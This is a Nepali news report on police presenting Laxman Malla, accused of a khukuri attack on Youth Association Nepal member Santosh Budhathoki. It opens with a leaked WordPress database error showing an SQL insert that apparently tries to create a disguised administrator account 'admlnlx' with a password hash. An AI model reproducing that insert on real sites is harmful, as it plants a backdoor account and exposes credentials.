WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIoe4/Dsu5RYiygZVeVlZhhQ.uBKbj1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 14:47:04', '', 'admlnlx', 'admlnlx')
कोहलपुर (बाँके), पुस २६-
युवा सङ्घ नेपालका केन्द्रीय सदस्य सन्तोष बुढाथोकीमाथि खुकुरी प्रहार गरी फरार भएका मुख्य आरोपी लक्ष्मण मल्ललाई प्रहरीले आज पक्राउ गरी आज सार्वजनिक गरेको छ ।
कोहलपुर इलाका प्रहरी कार्यालयले आज आयोजना गरेको पत्रकार सम्मेलनमा खुकुरी प्रहार गर्ने बाजुरा रुगिन गाविस–१ घर भई हाल कोहलपुर नगरपालिका–१० बस्ने १९ वर्षीय लक्ष्मण मल्ललाई सार्वजनिक गरेको हो ।
यही पुस १४ गते राति ८ बजे नेपालगन्ज सुर्खेत सडकखण्डको कोहलपुर–११ विद्युत्रोड नजिकै रहेको वेलकम कटेजमा युवा सङ्घका केन्द्रीय सदस्य बुढाथोेकीलाई खुकुरी प्रहार गर्ने मुख्य आरोपी मल्ल फरार भएका थिए ।
फरार मल्ललाई प्रहरीले पक्राउ गरी सार्वजनिक गरेको हो । “खुकुरी प्रहार भएको २५ मिनेटपछि मात्रै हामीलाई घटनाबारे थाहा भयो ।” प्रमुख प्रहरी नायब उपरीक्षक सुरेशप्रसाद काफ्लेले भन्नुभयो – “घाइतेसंग तत्कालै लिइएको बयानअनुसार हामीले फरार मल्लको खोजी र घटनाको अनुसन्धान थालेका हौंँ ।”घटना भएको ११ दिनपछि आरोपी मल्ललाई पुस २३ गते काठमाडौँबाट प्रहरीले पक्राउ गरेको थियो ।
“घटनापछि १७ गते मुख्य आरोपी मल्ल भाग्न प्रयोग गरिएको अनटेष्ट सुजुकी जिक्सर बाइक र २१ गते वारदातमा प्रयोग भएको खुकुरी महादेवपुरी–५ ढकेरीमा बरामत ग¥यौँ”, काफ्लले भन्नुभयो – “सोही दिन आरोपी फरार भएको बा१४च ४७९ नं को कार पनि बरामत भएकाले फरार अभियुक्त पक्राउ गर्न प्रहरी सफल भएको हो ।
खुकुरी प्रहारमा अन्य व्यक्तिको पनि संलग्नता रहेको हुन सक्ने भन्दै घटनाबारे थप अनुसन्धान भइरहेको बाँकेका प्रहरी प्रमुख प्रहरी उपरीक्षक टेकप्रसाद राईले जानकारी दिनुभयो ।
घटनाबारे अनुसन्धानका लागि प्रहरीले थप ११ जनालाई हिरासतमा लिएको जनाएको छ । घाइते बुढाथोकीको भारतको लखनउमा उपचार भइरहेको जनाइएको छ ।- रासस